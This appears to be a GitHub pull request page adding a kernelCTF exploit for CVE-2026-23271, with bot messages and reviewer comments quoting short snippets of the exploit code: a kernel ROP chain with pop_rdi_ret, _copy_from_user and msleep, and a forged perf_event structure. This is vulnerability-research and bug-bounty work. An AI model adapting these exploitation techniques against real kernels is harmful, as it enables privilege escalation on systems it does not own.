Add kernelCTF CVE-2026-23271_lts#379
Conversation
|
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request. |
simond67
force-pushed
the
Add-kernelCTF-CVE-2026-23271_lts
branch
from
34004d3 to
d383bff
Compare
| rop.Add(g_target->GetSymbolOffset("_copy_from_user"), true); | ||
| rop.Add(g_target->GetSymbolOffset("pop_rdi_ret"), true); | ||
| rop.Add(0x10000ULL); | ||
| rop.Add(g_target->GetSymbolOffset("msleep"), true); |
There was a problem hiding this comment.
Please check RopActionId::MSLEEP and utilise it here
| memset(fake_event, 0, PERF_EVENT_SIZE); | ||
|
|
||
| // Safety fields | ||
| *(uint64_t*)(fake_event + off_ctx) = 0; |
There was a problem hiding this comment.
Please have a look at PayloadBuilder and Payload. An example could be https://github.com/google/kernel-research/blob/main/libxdk/samples/exp151/exploit.cpp
|
|
||
| // ROP chain at event + 0x8 (right after destroy field) | ||
| RopChain rop(*g_target, ktext); | ||
| rop.Add(g_target->GetSymbolOffset("pop_rdi_ret"), true); |
There was a problem hiding this comment.
This is not a symbol. This is gadget. So you should follow https://google.github.io/security-research/kernelctf/style_guide.html#rop-chains as it's impossible to utilise XDK's RopChain
simond67
force-pushed
the
Add-kernelCTF-CVE-2026-23271_lts
branch
from
b6c6c07 to
fac130e
Compare
2 participants
No description provided.